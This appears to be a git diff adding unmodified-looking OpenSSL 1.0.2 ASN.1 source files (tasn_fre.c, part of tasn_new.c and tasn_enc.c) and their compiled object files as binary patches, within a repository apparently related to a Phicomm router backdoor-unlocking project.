+    case V_ASN1_PRINTABLESTRING:
+    case V_ASN1_T61STRING:
+    case V_ASN1_VIDEOTEXSTRING:
+    case V_ASN1_IA5STRING:
+    case V_ASN1_UTCTIME:
+    case V_ASN1_GENERALIZEDTIME:
+    case V_ASN1_GRAPHICSTRING:
+    case V_ASN1_VISIBLESTRING:
+    case V_ASN1_GENERALSTRING:
+    case V_ASN1_UNIVERSALSTRING:
+    case V_ASN1_BMPSTRING:
+    case V_ASN1_UTF8STRING:
+    case V_ASN1_SEQUENCE:
+    case V_ASN1_SET:
+    default:
+        /* All based on ASN1_STRING and handled the same */
+        strtmp = (ASN1_STRING *)*pval;
+        /* Special handling for NDEF */
+        if ((it->size == ASN1_TFLG_NDEF)
+            && (strtmp->flags & ASN1_STRING_FLAG_NDEF)) {
+            if (cout) {
+                strtmp->data = cout;
+                strtmp->length = 0;
+            }
+            /* Special return code */
+            return -2;
+        }
+        cont = strtmp->data;
+        len = strtmp->length;
+
+        break;
+
+    }
+    if (cout && len)
+        memcpy(cout, cont, len);
+    return len;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..8570f34ff129cec51bee47022cd87b67ad354931
GIT binary patch
literal 8704
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_fre.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_fre.c
new file mode 100644
index 0000000..aeea4ef
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_fre.c
@@ -0,0 +1,249 @@
+/* tasn_fre.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stddef.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/objects.h>
+
+static void asn1_item_combine_free(ASN1_VALUE **pval, const ASN1_ITEM *it,
+                                   int combine);
+
+/* Free up an ASN1 structure */
+
+void ASN1_item_free(ASN1_VALUE *val, const ASN1_ITEM *it)
+{
+    asn1_item_combine_free(&val, it, 0);
+}
+
+void ASN1_item_ex_free(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+    asn1_item_combine_free(pval, it, 0);
+}
+
+static void asn1_item_combine_free(ASN1_VALUE **pval, const ASN1_ITEM *it,
+                                   int combine)
+{
+    const ASN1_TEMPLATE *tt = NULL, *seqtt;
+    const ASN1_EXTERN_FUNCS *ef;
+    const ASN1_COMPAT_FUNCS *cf;
+    const ASN1_AUX *aux = it->funcs;
+    ASN1_aux_cb *asn1_cb;
+    int i;
+    if (!pval)
+        return;
+    if ((it->itype != ASN1_ITYPE_PRIMITIVE) && !*pval)
+        return;
+    if (aux && aux->asn1_cb)
+        asn1_cb = aux->asn1_cb;
+    else
+        asn1_cb = 0;
+
+    switch (it->itype) {
+
+    case ASN1_ITYPE_PRIMITIVE:
+        if (it->templates)
+            ASN1_template_free(pval, it->templates);
+        else
+            ASN1_primitive_free(pval, it);
+        break;
+
+    case ASN1_ITYPE_MSTRING:
+        ASN1_primitive_free(pval, it);
+        break;
+
+    case ASN1_ITYPE_CHOICE:
+        if (asn1_cb) {
+            i = asn1_cb(ASN1_OP_FREE_PRE, pval, it, NULL);
+            if (i == 2)
+                return;
+        }
+        i = asn1_get_choice_selector(pval, it);
+        if ((i >= 0) && (i < it->tcount)) {
+            ASN1_VALUE **pchval;
+            tt = it->templates + i;
+            pchval = asn1_get_field_ptr(pval, tt);
+            ASN1_template_free(pchval, tt);
+        }
+        if (asn1_cb)
+            asn1_cb(ASN1_OP_FREE_POST, pval, it, NULL);
+        if (!combine) {
+            OPENSSL_free(*pval);
+            *pval = NULL;
+        }
+        break;
+
+    case ASN1_ITYPE_COMPAT:
+        cf = it->funcs;
+        if (cf && cf->asn1_free)
+            cf->asn1_free(*pval);
+        break;
+
+    case ASN1_ITYPE_EXTERN:
+        ef = it->funcs;
+        if (ef && ef->asn1_ex_free)
+            ef->asn1_ex_free(pval, it);
+        break;
+
+    case ASN1_ITYPE_NDEF_SEQUENCE:
+    case ASN1_ITYPE_SEQUENCE:
+        if (asn1_do_lock(pval, -1, it) > 0)
+            return;
+        if (asn1_cb) {
+            i = asn1_cb(ASN1_OP_FREE_PRE, pval, it, NULL);
+            if (i == 2)
+                return;
+        }
+        asn1_enc_free(pval, it);
+        /*
+         * If we free up as normal we will invalidate any ANY DEFINED BY
+         * field and we wont be able to determine the type of the field it
+         * defines. So free up in reverse order.
+         */
+        tt = it->templates + it->tcount - 1;
+        for (i = 0; i < it->tcount; tt--, i++) {
+            ASN1_VALUE **pseqval;
+            seqtt = asn1_do_adb(pval, tt, 0);
+            if (!seqtt)
+                continue;
+            pseqval = asn1_get_field_ptr(pval, seqtt);
+            ASN1_template_free(pseqval, seqtt);
+        }
+        if (asn1_cb)
+            asn1_cb(ASN1_OP_FREE_POST, pval, it, NULL);
+        if (!combine) {
+            OPENSSL_free(*pval);
+            *pval = NULL;
+        }
+        break;
+    }
+}
+
+void ASN1_template_free(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt)
+{
+    int i;
+    if (tt->flags & ASN1_TFLG_SK_MASK) {
+        STACK_OF(ASN1_VALUE) *sk = (STACK_OF(ASN1_VALUE) *)*pval;
+        for (i = 0; i < sk_ASN1_VALUE_num(sk); i++) {
+            ASN1_VALUE *vtmp;
+            vtmp = sk_ASN1_VALUE_value(sk, i);
+            asn1_item_combine_free(&vtmp, ASN1_ITEM_ptr(tt->item), 0);
+        }
+        sk_ASN1_VALUE_free(sk);
+        *pval = NULL;
+    } else
+        asn1_item_combine_free(pval, ASN1_ITEM_ptr(tt->item),
+                               tt->flags & ASN1_TFLG_COMBINE);
+}
+
+void ASN1_primitive_free(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+    int utype;
+    if (it) {
+        const ASN1_PRIMITIVE_FUNCS *pf;
+        pf = it->funcs;
+        if (pf && pf->prim_free) {
+            pf->prim_free(pval, it);
+            return;
+        }
+    }
+    /* Special case: if 'it' is NULL free contents of ASN1_TYPE */
+    if (!it) {
+        ASN1_TYPE *typ = (ASN1_TYPE *)*pval;
+        utype = typ->type;
+        pval = &typ->value.asn1_value;
+        if (!*pval)
+            return;
+    } else if (it->itype == ASN1_ITYPE_MSTRING) {
+        utype = -1;
+        if (!*pval)
+            return;
+    } else {
+        utype = it->utype;
+        if ((utype != V_ASN1_BOOLEAN) && !*pval)
+            return;
+    }
+
+    switch (utype) {
+    case V_ASN1_OBJECT:
+        ASN1_OBJECT_free((ASN1_OBJECT *)*pval);
+        break;
+
+    case V_ASN1_BOOLEAN:
+        if (it)
+            *(ASN1_BOOLEAN *)pval = it->size;
+        else
+            *(ASN1_BOOLEAN *)pval = -1;
+        return;
+
+    case V_ASN1_NULL:
+        break;
+
+    case V_ASN1_ANY:
+        ASN1_primitive_free(pval, NULL);
+        OPENSSL_free(*pval);
+        break;
+
+    default:
+        ASN1_STRING_free((ASN1_STRING *)*pval);
+        *pval = NULL;
+        break;
+    }
+    *pval = NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_fre.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_fre.o
new file mode 100644
index 0000000000000000000000000000000000000000..b8daff71f8b00769e6ca8eb48f81f84e58ea9848
GIT binary patch
literal 4760
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
A+yDRo

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_new.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_new.c
new file mode 100644
index 0000000..d25c68c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_new.c
@@ -0,0 +1,381 @@
+/* tasn_new.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stddef.h>
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+#include <openssl/err.h>
+#include <openssl/asn1t.h>
+#include <string.h>
+
+static int asn1_item_ex_combine_new(ASN1_VALUE **pval, const ASN1_ITEM *it,
+                                    int combine);
+static void asn1_item_clear(ASN1_VALUE **pval, const ASN1_ITEM *it);
+static void asn1_template_clear(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt);
+static void asn1_primitive_clear(ASN1_VALUE **pval, const ASN1_ITEM *it);
+
+ASN1_VALUE *ASN1_item_new(const ASN1_ITEM *it)
+{
+    ASN1_VALUE *ret = NULL;
+    if (ASN1_item_ex_new(&ret, it) > 0)
+        return ret;
+    return NULL;
+}
+
+/* Allocate an ASN1 structure */
+
+int ASN1_item_ex_new(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+    return asn1_item_ex_combine_new(pval, it, 0);
+}
+
+static int asn1_item_ex_combine_new(ASN1_VALUE **pval, const ASN1_ITEM *it,
+                                    int combine)
+{
+    const ASN1_TEMPLATE *tt = NULL;
+    const ASN1_COMPAT_FUNCS *cf;
+    const ASN1_EXTERN_FUNCS *ef;
+    const ASN1_AUX *aux = it->funcs;
+    ASN1_aux_cb *asn1_cb;
+    ASN1_VALUE **pseqval;
+    int i;
+    if (aux && aux->asn1_cb)
+        asn1_cb = aux->asn1_cb;
+    else
+        asn1_cb = 0;
+
+    if (!combine)
+        *pval = NULL;
+
+#ifdef CRYPTO_MDEBUG
+    if (it->sname)
+        CRYPTO_push_info(it->sname);
+#endif
+
+    switch (it->itype) {
+
+    case ASN1_ITYPE_EXTERN:
+        ef = it->funcs;
+        if (ef && ef->asn1_ex_new) {
+            if (!ef->asn1_ex_new(pval, it))
+                goto memerr;
+        }
+        break;
+
+    case ASN1_ITYPE_COMPAT:
+        cf = it->funcs;
+        if (cf && cf->asn1_new) {
+            *pval = cf->asn1_new();
+            if (!*pval)
+                goto memerr;
+        }
+        break;
+
